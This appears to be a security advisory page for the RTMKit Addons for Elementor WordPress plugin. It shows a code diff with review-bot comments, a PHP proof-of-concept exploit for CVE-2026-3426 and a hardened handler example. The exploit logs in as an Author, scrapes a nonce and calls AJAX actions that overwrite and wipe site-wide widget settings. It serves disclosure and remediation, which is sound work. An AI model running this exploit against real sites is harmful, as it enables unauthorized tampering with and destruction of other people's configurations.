+                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-4 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
+                        <h4 class="accent-color fs-6">UPGRADE TO PRO</h4>
+                        <h1 class="m-0 fw-light fs-2 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-2 lh-1 text-white">Hi-End Power</span></h1>
+                        <span class="text-white px-2">
                             Unlock the full power of your workflow. Access 70+ widgets, 25+ templates, 9 theme builder features, 1200+ icons, extensions, and priority support. Only in RTMkit Pro.
                         </span>
                         <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent fw-bold align-items-center gap-2">
--- a/rometheme-for-elementor/views/installed_templates.php
+++ b/rometheme-for-elementor/views/installed_templates.php
@@ -109,7 +109,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
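Review bot: the removed line shipped a developer's local URL (http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro) in a release view, so a user on 2.0.2 clicking this button landed on a dead localhost link; before tagging 2.0.3 it is worth a grep across views/ for other `localhost` or `wp.new` strings. The replacement is an external link opened with target="_blank" and no rel attribute; add rel="noopener noreferrer" so the pricing page cannot reach window.opener.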
@@ -151,7 +151,6 @@
                                 <path d="M17.3837 9.26905C17.3933 9.2457 17.3989 9.22152 17.4059 9.19761C17.4118 9.17764 17.4194 9.15852 17.4236 9.13798C17.4321 9.09636 17.4357 9.05389 17.4366 9.0117C17.4366 9.00805 17.4377 9.00439 17.4377 9.00073C17.4377 8.95461 17.4329 8.9082 17.4239 8.86264C17.4197 8.84183 17.4118 8.82242 17.4059 8.80217C17.3989 8.77855 17.3936 8.75464 17.384 8.73158C17.3739 8.70739 17.3601 8.68517 17.3474 8.66239C17.3379 8.64523 17.3306 8.62723 17.3193 8.61064C17.2934 8.57183 17.2642 8.53583 17.2316 8.5032L10.9614 2.23245C10.6869 1.95767 10.2414 1.95767 9.96714 2.23245C9.69236 2.50695 9.69236 2.95217 9.96714 3.22667L15.0356 8.29536L1.26668 8.2827H1.26611C0.87827 8.2827 0.56327 8.59714 0.562988 8.98527C0.562707 9.37367 0.877145 9.68867 1.26555 9.68895L15.0389 9.70161L9.96743 14.7734C9.69264 15.0479 9.69264 15.4931 9.96743 15.7676C10.1047 15.9049 10.2847 15.9735 10.4647 15.9735C10.6447 15.9735 10.8247 15.9049 10.9619 15.7676L17.2318 9.4977C17.2647 9.46508 17.294 9.4288 17.3199 9.38998C17.3317 9.37255 17.3396 9.3537 17.3497 9.33542C17.3618 9.31348 17.375 9.29239 17.3846 9.26905H17.3837Z" fill="currentColor" />
                             </svg>
                             Import</button>
-
                     </div>
                 </div>
             </div>
@@ -188,7 +187,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
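Review bot: this is the same localhost-to-pricing-URL replacement as the hunk at line 109, and the anchor plus the full inline SVG is duplicated verbatim there and again in sidebar.php. Factoring the upgrade button into one partial would have made the stale URL a one-line fix and keeps the copies from drifting apart again; the rel="noopener noreferrer" remark from the earlier hunk applies to this link too.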
@@ -249,7 +248,7 @@
                 </div>
             </div>
         </div>
-        <?php foreach ($datas['data_template'] as $data) :
+        <?php foreach ($datas['data_template'] as $data) :
             $manifest = json_decode(file_get_contents($rtmTemplateDir . '/' . $data['hash_id'] . '/manifest.json'));
             $imgurl = $rtmTemplateUrl . '/' . $data['hash_id'] . '/' . $manifest->templates[0]->screenshot;
         ?>
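Review bot: the only change in this hunk is whitespace on the foreach line, but the two context lines after it read the template manifest with file_get_contents() and json_decode() and then dereference $manifest->templates[0]->screenshot without checking either result. A missing or malformed manifest.json under $rtmTemplateDir . '/' . $data['hash_id'] produces a PHP warning and then a fatal on null property access, taking the whole installed-templates page down. Guard the loop body with something like `if ($manifest === null || empty($manifest->templates[0]->screenshot)) { continue; }`, and since $data['hash_id'] is used as a path component, this code relies on that value having been validated when the template was stored.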
--- a/rometheme-for-elementor/views/modules.php
+++ b/rometheme-for-elementor/views/modules.php
@@ -91,7 +91,7 @@
                 <div id="<?php echo esc_attr($c) ?>" class="card rounded-4  flex-column gap-3">
                     <div class="pb-4 pt-1 border-bottom d-flex align-items-center gap-3">
                         <i class="fa-solid fa-circle" style="font-size: 10px;"></i>
-                        <h4 class="m-0"><?php echo esc_html(ucwords($c)) ?></h4>
+                        <h4 class="m-0"><?php echo esc_html(ucwords($c == 'themebuilder' ? 'Theme Builder' : $c)) ?></h4>
                     </div>
                     <div class="row row-cols-3 g-3">
                         <?php
--- a/rometheme-for-elementor/views/setup-wizard.php
+++ b/rometheme-for-elementor/views/setup-wizard.php
@@ -407,7 +407,7 @@

                     <div class="footer">
                         <button id="next-button" class="btn btn-link" data-next="4">Back</button>
-                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Next</button>
+                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Skip</button>
                     </div>
                 </div>
             </div>
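Review bot: both buttons in this footer carry id="next-button" (the Back button with data-next="4" and the renamed Skip button with data-next="6"), so the document has duplicate IDs; document.getElementById('next-button') returns only the first match, which is Back, so any wizard JavaScript keyed on that id acts on the wrong button. Give the two buttons distinct ids or drive the handler from a class selector. Relabeling Next to Skip while leaving data-next="6" unchanged also means the step advances identically either way; if Skip is meant to bypass the step's settings, that needs to be reflected in the handler, not just the label.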
--- a/rometheme-for-elementor/views/sidebar.php
+++ b/rometheme-for-elementor/views/sidebar.php
@@ -26,6 +26,8 @@
 </svg>
 '
 ];
+
+$isProActive = RTMKitCorePlugin::instance()->pro_is_active();
 ?>


@@ -40,32 +42,34 @@
         <div class="menus gap-3">
             <?php foreach ($menus as $section => $items): ?>
                 <div class="menu-section">
-
-                        <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
-                            <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
-                        </button>
-                        <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
-                            <ul class="menu-list">
-                                <?php foreach ($items as $key => $item): ?>
-                                    <li class="menu-item">
-                                        <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
-                                            <?php echo esc_html($item['title']); ?>
-                                        </a>
-                                    </li>
-                                <?php endforeach; ?>
-                            </ul>
-                        </div>
-
+
+                    <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
+                        <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
+                    </button>
+                    <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
+                        <ul class="menu-list">
+                            <?php foreach ($items as $key => $item): ?>
+                                <li class="menu-item">
+                                    <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
+                                        <?php echo esc_html($item['title']); ?>
+                                    </a>
+                                </li>
+                            <?php endforeach; ?>
+                        </ul>
+                    </div>
+
                 </div>
             <?php endforeach; ?>
         </div>
     </div>
     <div class="sidebar-footer">
-        <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
-            <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
-                <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
-            </svg>
-            Go to Pro
-        </a>
+        <?php if (! $isProActive) : ?>
+            <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
+                <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
+                    <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
+                </svg>
+                Go to Pro
+            </a>
+        <?php endif; ?>
     </div>
 </div>
 No newline at end of file
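Review bot: in the re-indented menu loop, target="<?php echo esc_attr($item['target']) ?>" reads $item['target'] unconditionally, while the href on the same line guards it with isset($item['target']); for internal menu entries that have no target key this emits an undefined-index notice (a warning on PHP 8) on every sidebar render and an empty target="" attribute. Apply the same isset() guard to the target attribute and emit rel="noopener" whenever the target is _blank. The new $isProActive guard around the Go to Pro footer is fine; note that <?php echo $icons[$section] ?> is still echoed unescaped, which is acceptable only because $icons is the hard-coded SVG array defined at the top of this same file, so nothing user-controlled should ever be added to it.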

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
//
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3426 - RTMKit Addons for Elementor <= 2.0.2 - Authenticated (Author+)
// Missing Authorization to Widget Configuration Modification
//
// Flow: log in as an Author, scrape the value that check_ajax_referer('rtmkit_nonce', 'nonce')
// expects from a plugin admin page, then call the two AJAX handlers that run only
// that nonce check and never check the manage_options capability.
// Run with: php poc.php

// Configuration: set these variables before running
$target_url = 'http://example.com';  // Target WordPress site URL, no trailing slash
$username   = 'author_user';         // WordPress username with the Author role
$password   = 'author_password';     // WordPress password

// Small cURL helper so every request is built the same way
function http_request($url, $post = null, array $headers = [], $with_headers = false) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, $with_headers);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    if ($post !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $body = curl_exec($ch);
    if ($body === false) {
        fwrite(STDERR, "[!] cURL error: " . curl_error($ch) . "\n");
        exit(1);
    }
    curl_close($ch);
    return $body;
}

// Step 1: log in to WordPress and capture the authentication cookies.
// wp-login.php rejects the POST with "cookies are blocked" when testcookie=1 is
// sent without the wordpress_test_cookie cookie, so send that cookie along.
echo "[*] Logging in as $username...\n";
$response = http_request(
    $target_url . '/wp-login.php',
    http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => 1,
    ]),
    ['Cookie: wordpress_test_cookie=WP%20Cookie%20check'],
    true
);

// Extract cookies from the response headers
preg_match_all('/^Set-Cookie:\s*([^=]+)=([^;]+)/im', $response, $matches);
$cookies = [];
foreach ($matches[1] as $index => $key) {
    $cookies[] = $key . '=' . $matches[2][$index];
}
$cookie_string = implode('; ', $cookies);

// A successful login sets wordpress_logged_in_<hash>; anything else is a failure
if (strpos($cookie_string, 'wordpress_logged_in_') === false) {
    echo "[!] Login failed (no wordpress_logged_in cookie in the response). Exiting.\n";
    exit(1);
}
echo "[*] Login successful. Extracted cookies.\n";

// Step 2: obtain the plugin's AJAX nonce. The plugin embeds it in its admin pages,
// so any user who can load such a page (an Author included) receives one. The
// page slug below is an assumption; adjust it if the plugin registers its menu
// under a different slug, or scrape any other admin page that loads the plugin's
// scripts.
$admin_page = http_request(
    $target_url . '/wp-admin/admin.php?page=rtmkit',
    null,
    ['Cookie: ' . $cookie_string]
);

// Common localization patterns: {"nonce":"..."} or var rtmkit_nonce = '...';
if (! preg_match('/"nonce"\s*:\s*"([^"]+)"/', $admin_page, $nonce_match)) {
    preg_match('/var\s+rtmkit_nonce\s*=\s*[\'"]([^\'"]+)[\'"]/', $admin_page, $nonce_match);
}
$nonce = $nonce_match[1] ?? '';

if ($nonce === '') {
    // check_ajax_referer() dies with "-1" on a bad nonce, so guessing one is pointless
    echo "[!] Could not extract the nonce from the admin page. Exiting.\n";
    exit(1);
}
echo "[*] Nonce obtained: $nonce\n";

// Step 3: save_widget() - modify the site-wide widget configuration.
// The handler reads its JSON body with file_get_contents('php://input'), so the
// settings go in the raw POST body while 'action' and 'nonce' travel in the
// query string; admin-ajax.php and check_ajax_referer() both read $_REQUEST, so
// query-string parameters satisfy them. The keys below are illustrative; the
// options are stored under the 'rkit-widget-options' option.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload  = json_encode([
    'widget-id'    => 'test-widget',
    'enabled'      => '0',               // disable a specific widget
    'some_setting' => 'malicious value',
]);

echo "[*] Attempting to save malicious widget configuration via save_widget...\n";
$response1 = http_request(
    $ajax_url . '?' . http_build_query(['action' => 'save_widget', 'nonce' => $nonce]),
    $payload,
    ['Content-Type: application/json', 'Cookie: ' . $cookie_string]
);
echo "[*] Response from save_widget: $response1\n";

// Step 4: reset_all_widgets() - wipe the widget configuration. No body is needed.
$response2 = http_request(
    $ajax_url,
    http_build_query(['action' => 'reset_all_widgets', 'nonce' => $nonce]),
    ['Cookie: ' . $cookie_string]
);
echo "[*] Response from reset_all_widgets: $response2\n";

// admin-ajax.php answers "0" when the action is not registered and "-1" when
// check_ajax_referer() rejects the nonce; a success body means the unprivileged
// call went through.
if (strpos($response2, 'success') !== false) {
    echo "[+] Exploit successful! Widget configuration has been reset.\n";
} else {
    echo "[-] Exploit may have failed. Check the responses above.\n";
}
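The fix the advisory calls for is an authorization check in front of each handler. The following is an added example, not the plugin's own code: it reconstructs the handler shape from the description above (nonce-only check_ajax_referer(), JSON read from php://input, settings stored under the 'rkit-widget-options' option name the PoC comment mentions) and shows the vulnerable form beside a hardened one. The class name, method names, the settings schema (widget slug mapped to an enabled flag) and the error messages are assumptions made for illustration.

```php
<?php
// Added example: vulnerable vs. hardened wp_ajax_* handler pattern.
// NOT the plugin's source. Names and the settings schema are assumptions.

class Rtmkit_Widget_Storage_Example {
    // Option name per the PoC comment above; the value layout is assumed.
    const OPTION = 'rkit-widget-options';

    public function register() {
        // wp_ajax_* hooks fire only for logged-in users, but "logged in" is
        // all they guarantee: an Author reaches these callbacks just as an
        // Administrator does. Authorization must happen inside the callback.
        add_action('wp_ajax_save_widget',       [$this, 'save_widget']);
        add_action('wp_ajax_reset_all_widgets', [$this, 'reset_all_widgets']);
    }

    // VULNERABLE shape (CWE-862): nonce only. check_ajax_referer() proves the
    // request carries a nonce minted for the current user's session, which
    // defeats CSRF; it says nothing about what that user is allowed to do.
    public function save_widget_vulnerable() {
        check_ajax_referer('rtmkit_nonce', 'nonce');
        $settings = json_decode(file_get_contents('php://input'), true);
        update_option(self::OPTION, $settings);   // any Author can overwrite this
        wp_send_json_success();
    }

    // HARDENED: CSRF check, then capability check, then input validation,
    // and only then a state change.
    public function save_widget() {
        check_ajax_referer('rtmkit_nonce', 'nonce');              // CSRF
        if (! current_user_can('manage_options')) {               // AuthZ
            wp_send_json_error(['message' => 'Insufficient permissions'], 403);
        }

        $settings = json_decode((string) file_get_contents('php://input'), true);
        if (! is_array($settings)) {
            wp_send_json_error(['message' => 'Invalid JSON body'], 400);
        }

        // Assumed schema: { "<widget-slug>": true|false, ... }.
        // Normalise keys and coerce values so nothing unexpected reaches the DB.
        $clean = [];
        foreach ($settings as $key => $enabled) {
            $key = sanitize_key((string) $key);
            if ($key === '') {
                continue;
            }
            $clean[$key] = (bool) $enabled;
        }

        update_option(self::OPTION, $clean);
        wp_send_json_success(['saved' => count($clean)]);
    }

    // HARDENED reset: same two gates before the destructive operation.
    public function reset_all_widgets() {
        check_ajax_referer('rtmkit_nonce', 'nonce');
        if (! current_user_can('manage_options')) {
            wp_send_json_error(['message' => 'Insufficient permissions'], 403);
        }
        delete_option(self::OPTION);
        wp_send_json_success();
    }
}

(new Rtmkit_Widget_Storage_Example())->register();
```

The point to carry into any review of a wp_ajax_* callback: check_ajax_referer() is a CSRF defence only, and the nonce is issued to whoever is logged in, so an Author's nonce is as valid as an Administrator's. Authorization is a separate current_user_can() call, and for settings that affect the whole site the capability to demand is manage_options. A quick audit is to list every add_action('wp_ajax_...') registration in the plugin and confirm the callback contains both calls before it writes anything.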
